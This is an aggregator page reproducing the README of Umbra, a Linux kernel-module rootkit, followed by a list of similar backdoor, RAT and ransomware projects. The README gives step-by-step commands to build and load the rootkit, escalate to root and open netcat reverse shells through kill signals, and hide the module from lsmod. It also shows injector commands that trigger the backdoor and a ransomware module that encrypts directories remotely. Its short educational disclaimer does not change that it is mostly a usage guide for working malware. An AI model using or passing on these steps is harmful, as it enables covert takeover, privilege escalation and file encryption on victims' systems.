All Projects â†’ h3xduck â†’ Umbra

h3xduck / Umbra

Licence: GPL-2.0 license
A LKM rootkit targeting 4.x and 5.x kernel versions which opens a backdoor that can spawn a reverse shell to a remote host, launch malware and more.

Programming Languages

c
50402 projects - #5 most used programming language
Makefile
30231 projects
shell
77523 projects

Projects that are alternatives of or similar to Umbra

satan
🔓 x86 Linux Kernel rootkit for Debian 9 (4.9.0-11-686-pae)
Stars: ✭ 31 (-68.37%)
Mutual labels:  backdoor, rootkit, linux-kernel, linux-kernel-module
Diamorphine
LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x (x86/x86_64 and ARM64)
Stars: ✭ 725 (+639.8%)
Mutual labels:  backdoor, rootkit, malware, linux-kernel
Malware
Rootkits | Backdoors | Sniffers | Virus | Ransomware | Steganography | Cryptography | Shellcodes | Webshells | Keylogger | Botnets | Worms | Other Network Tools
Stars: ✭ 156 (+59.18%)
Mutual labels:  backdoor, rootkit, malware, ransomware
Xeexe Topantivirusevasion
Undetectable & Xor encrypting with custom KEY (FUD Metasploit Rat) bypass Top Antivirus like BitDefender,Malwarebytes,Avast,ESET-NOD32,AVG,... & Automatically Add ICON and MANIFEST to excitable
Stars: ✭ 387 (+294.9%)
Mutual labels:  backdoor, malware, ransomware
Lime Rat
LimeRAT | Simple, yet powerful remote administration tool for Windows (RAT)
Stars: ✭ 663 (+576.53%)
Mutual labels:  backdoor, malware, ransomware
Father
LD_PRELOAD rootkit
Stars: ✭ 59 (-39.8%)
Mutual labels:  backdoor, rootkit, malware
Hacktheworld
An Python Script For Generating Payloads that Bypasses All Antivirus so far .
Stars: ✭ 527 (+437.76%)
Mutual labels:  backdoor, malware
Ghost
👻 RAT (Remote Access Trojan) - Silent Botnet - Full Remote Command-Line Access - Download & Execute Programs - Spread Virus' & Malware
Stars: ✭ 312 (+218.37%)
Mutual labels:  backdoor, malware
Thefatrat
Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV softw…
Stars: ✭ 5,944 (+5965.31%)
Mutual labels:  backdoor, malware
Php Antimalware Scanner
AMWScan (PHP Antimalware Scanner) is a free tool to scan php files and analyze your project to find any malicious code inside it.
Stars: ✭ 181 (+84.69%)
Mutual labels:  backdoor, malware
S6 pcie microblaze
PCI Express DIY hacking toolkit for Xilinx SP605
Stars: ✭ 301 (+207.14%)
Mutual labels:  backdoor, rootkit
Unencrypted Backdoor With Process Cloaking
Unencrypted backdoor
Stars: ✭ 16 (-83.67%)
Mutual labels:  backdoor, malware
Webshell
Webshell && Backdoor Collection
Stars: ✭ 1,056 (+977.55%)
Mutual labels:  backdoor, rootkit
Vegile
This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process,unlimited your session in metasploit and transparent. Even when it killed, it will re-run again. There always be a procces which while run another process,So we can assume that this procces is unstopable like a Ghost in The Shell
Stars: ✭ 478 (+387.76%)
Mutual labels:  backdoor, rootkit
Mass Rat
Basic Multiplatform Remote Administration Tool - Xamarin
Stars: ✭ 127 (+29.59%)
Mutual labels:  backdoor, malware
Njrat 0.7d Stub Csharp
njRAT C# Stub - Fixed For PowerShell
Stars: ✭ 28 (-71.43%)
Mutual labels:  backdoor, malware
Thoron
Thoron Framework is a Linux post-exploitation framework that exploits Linux TCP vulnerability to provide a shell-like connection. Thoron Framework has the ability to create simple payloads to provide Linux TCP attack.
Stars: ✭ 87 (-11.22%)
Mutual labels:  backdoor, linux-kernel
Openssh Backdoor Kit
💣 just for fun ¯\_(ツ)_/¯
Stars: ✭ 211 (+115.31%)
Mutual labels:  backdoor, rootkit
Remot3d
Remot3d: is a simple tool created for large pentesters as well as just for the pleasure of defacers to control server by backdoors
Stars: ✭ 263 (+168.37%)
Mutual labels:  backdoor, malware
Dr0p1t Framework
A framework that create an advanced stealthy dropper that bypass most AVs and have a lot of tricks
Stars: ✭ 1,132 (+1055.1%)
Mutual labels:  backdoor, malware

GitHub release (latest by date including pre-releases) Maintainability GitHub code size in bytes GitHub last commit

Umbra

Umbra is an experimental remotely controllable LKM rootkit for kernels 4.x and 5.x (up to 5.7) which opens a network backdoor that can spawn reverse shells to remote hosts, launch malware remotely and much more.

The rootkit is still under development, although the features listed below are already fully operational.

Backdoor in action

Note: This rootkit has been developed and tested using kernel 5.4.0 and Ubuntu 18.04.

Features

  • 🌟 Backdoor which spawns reverse shell to remote IP after receiving a malicious TCP packet.
  • 🌟 Use the Umbra Injector to control the rootkit remotely:
    • Remote reverse shell.
    • Hide/unhide rootkit remotely.
    • Launch Umbra Modules.

  • NEW: Added the Umbra Modules, special malware-like modules which enhance Umbra and can be launched remotely by the Umbra Injector.
  • NEW: Umbra module "Ransom" which turns Umbra into a remotely controllable ransomware.

Ransom module in action

  • Umbra hides all its files and directories from user commands such as ls.
  • Umbra can hide/unhide itself remotely and locally via signals.
  • Privilege escalation by sending signal 50.
  • Spawn netcat reverse shell on module load.
  • Spawn netcat reverse shell to a remote host by sending signal 51.

More functionalities will come in later updates.

Disclaimer

This rookit is purely for educational purposes. I am not responsible for any damage resulting from its unintended use.

Also bear in mind that Umbra only incorporates light hiding and protection mechanisms. It is not intended to be used on a real scenario.

IMPORTANT: If you are going to test this rootkit in your own machine, I strongly recommend to use a VM.

About the Umbra Modules: The ransom module uses a trivial encryption mechanism but it can and will certainly encrypt any folder in your machine. Although files can be easily decrypted, I definitely do not recommend running this towards your root folder or similar unless on a controlled environment.

Table of Contents

  1. Build and Install
  2. Unloading Umbra
  3. Local Control
  4. Umbra Injector: Remote Control
  5. Umbra Modules
  6. References

Build and install

Remember that you should have a 4.x or 5.x kernel available.

  1. Download your kernel header files
apt install linux-headers-$(uname -r)
  1. Configure your include path to cover the kernel header directory (usually under /usr/src). If you are using vscode, you can check .vscode/c_cpp_properties.json for an example on which directories to include.

  2. Clone the project

git clone https://github.com/h3xduck/Umbra.git
cd Umbra
  1. Build Umbra
make
  1. Load Umbra in the kernel and configure environment The script will install Umbra in the kernel and configure a special directory where to store the malware modules. The directory will be later hidden by the rootkit.
sudo ./install.sh

If you have previously run the script and wish to just install Umbra in the kernel, you can run:

sudo insmod ./umbra.ko

Unloading Umbra

Make sure Umbra is not in invisible mode, otherwise this will fail.

sudo rmmod umbra

Basic Usage: Local control

Change current user privileges to root

  • Send signal 50 to any PID.
kill -50 1

Start reverse netcat shell to IP:PORT

  • Set your desired IP and port in CONFIG.H before building the rootkit. By default 127.0.0.1:5888

  • Start listening at the remote host.

nc -lvp 5888
  • Send signal 51 to any PID. Umbra will catch it and start the shell.
kill -51 1

Note: Umbra also tries to start the reverse shell on load.

Hide the rootkit - Invisible mode

This will prevent the rootkit from being shown by commands such as lsmod, or being removed via rmmod.

kill -52 1

Unhide the rootkit

This reverts the invisible mode if active.

kill -53 1

Umbra Injector: Remote control

Get reverse shell via backdoor

The Umbra Injector can be run either before Umbra is installed (thus getting the shell once it is on), or after Umbra is installed on the target system.

./injector -S 127.0.0.1

The backdoor listens for packets with the following payload: UMBRA_PAYLOAD_GET_REVERSE_SHELL.

You can also build your own injector using my library RawTCP.

Hide the rootkit remotely - Invisible mode

This will prevent the rootkit from being shown by commands such as lsmod, or being removed via rmmod.

./injector -i 127.0.0.1

Unhide the rootkit remotely

This reverts the invisible mode if active.

./injector -u 127.0.0.1

Help

You can see the full information on how to run the Umbra Injector by:

./injector -h

Umbra Modules

The Umbra Modules will be stored by the install.sh script on /tmp/umbra, where Umbra will hide them. The directory will not visible by commands such as ls or similar.

Ransom module

This module can launch remote ransomware-like attacks via the Umbra Injector. Encrypted files appear with the .ubr extension.

Currently the encryption mechanism is a simple bit-level NOP, as a proof of concept. You may edit the module to include your own encryption algorithm.

Encrypt a directory and all its sub-directories

./injector -p /Your/Path/To/Encrypt -e 127.0.0.1

Decrypt a directory and all its sub-directories

./injector -p /Your/Path/To/Decrypt -d 127.0.0.1

References

The development of this rootkit involved a substantial amount of research about LKMs and rootkit techniques. The following is an incomplete list of the resources I used: How to create LKMs:

Linux syscall reference:

Some rootkit references:

License

This project is licensed under the GPLv2 license. See LICENSE

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].